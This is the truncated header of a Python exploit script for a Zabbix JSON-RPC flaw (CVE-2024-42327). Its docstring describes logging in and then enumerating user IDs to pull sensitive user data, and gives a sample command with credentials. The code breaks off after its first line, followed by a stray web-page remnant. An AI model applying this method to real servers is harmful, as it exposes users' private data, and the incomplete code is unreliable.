import requests
import argparse
"""
Exploit Script for CVE-2024-42327
Author: Alejandro Ramos (@aramosf)
Assisted by: ChatGPT
Date: 2024-12-01
This script demonstrates the exploitation of the vulnerability CVE-2024-42327,
registered by Zabbix as ZBX-25623. This vulnerability allows unauthorized
access to sensitive user information by abusing the JSON-RPC API.
References:
- CVE: CVE-2024-42327
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623
Functionality:
1. Logs in to the Zabbix JSON-RPC API to obtain a session token using a valid username and password.
2. Iterates over a range of user IDs (1 to 40), fetching user details for each ID.
Arguments:
- `-u` or `--url`: The API endpoint URL (e.g., http://192.168.201.128/api_jsonrpc.php).
- `-n` or `--username`: The username for authentication.
- `-p` or `--password`: The password for authentication.
Example:
python script.py -u "http://192.168.201.128/api_jsonrpc.php" -n "aramosf" -p "Hola1234"
Disclaimer:
This script is provided for educational purposes only. Unauthorized exploitation
of vulnerabilities is illegal and unethical. Use responsibly.
"""
def main(url, username, password):
headers = {
暂无评论